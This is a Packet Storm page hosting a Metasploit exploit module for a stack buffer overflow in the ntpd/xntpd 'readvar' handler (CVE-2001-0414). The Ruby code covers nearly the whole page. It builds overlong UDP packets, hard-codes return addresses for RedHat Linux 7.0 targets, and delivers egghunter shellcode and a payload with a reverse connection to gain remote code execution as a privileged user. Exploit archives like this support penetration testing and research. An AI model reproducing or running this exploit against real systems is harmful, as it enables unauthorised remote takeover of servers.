exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

NTPd Buffer Overflow

NTPd Buffer Overflow
Posted Oct 27, 2009
Authored by patrick | Site metasploit.com

This Metasploit module exploits a stack based buffer overflow in the ntpd and xntpd service. By sending an overly long 'readvar' request it is possible to execute code remotely. As the stack is corrupted, this module uses the Egghunter technique.

tags | exploit, overflow
advisories | CVE-2001-0414
SHA-256 | 009c6a0959755d8609b7f6680a3f93f21f0a42a6559a05ef0c29a657384e5fbd

NTPd Buffer Overflow

Change Mirror Download
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

include Msf::Exploit::Remote::Udp
include Msf::Exploit::Remote::Egghunter

def initialize(info = {})
super(update_info(info,
'Name' => 'NTP daemon readvar Buffer Overflow',
'Description' => %q{
This module exploits a stack based buffer overflow in the
ntpd and xntpd service. By sending an overly long 'readvar'
request it is possible to execute code remotely. As the stack
is corrupted, this module uses the Egghunter technique.
},
'Author' => 'patrick',
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2001-0414' ],
[ 'OSVDB', '805' ],
[ 'BID', '2540' ],
[ 'URL', 'http://www.kb.cert.org/vuls/id/970472' ],
],
'Payload' =>
{
'Space' => 220,
'BadChars' => "\x00\x01\x02\x16,=",
'StackAdjustment' => -3500,
'PrependEncoder' => Metasm::Shellcode.assemble(Metasm::Ia32.new, "xor eax,eax mov al,27 int 0x80").encode_string, # alarm(0)
'Compat' =>
{
'ConnectionType' => '-reverse',
},
},
'Platform' => [ 'linux' ],
'Arch' => [ ARCH_X86 ],
'Targets' =>
[
[ 'RedHat Linux 7.0 ntpd 4.0.99j', { 'Ret' => 0xbffffbb0 } ],
[ 'RedHat Linux 7.0 ntpd 4.0.99j w/debug', { 'Ret' => 0xbffff980 } ],
[ 'RedHat Linux 7.0 ntpd 4.0.99k', { 'Ret' => 0xbffffbb0 } ],
#[ 'FreeBSD 4.2-STABLE', { 'Ret' => 0xbfbff8bc } ],
[ 'Debugging', { 'Ret' => 0xdeadbeef } ],
],
'Privileged' => true,
'DisclosureDate' => 'Apr 04 2001',
'DefaultTarget' => 0))

register_options([Opt::RPORT(123)], self.class)
end

def exploit

hunter = generate_egghunter
egg = hunter[1]

connect_udp

pkt1 = "\x16\x02\x00\x01\x00\x00\x00\x00\x00\x00\x016stratum="
pkt2 = "\x16\x02\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00"

sploit = pkt1 + make_nops(512 - pkt1.length)
sploit[(220 + pkt1.length), 4] = [target['Ret']].pack('V')
sploit[(224 + pkt1.length), hunter[0].length] = hunter[0]

print_status("Trying target #{target.name}...")

print_status("Sending hunter")
udp_sock.put(sploit)
sleep(0.5)

print_status("Sending payload")
udp_sock.put(pkt1 + egg + egg + payload.encoded)
sleep(0.5)

print_status("Calling overflow trigger")
udp_sock.put(pkt2)
sleep(0.5)

handler
disconnect_udp

end

end

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close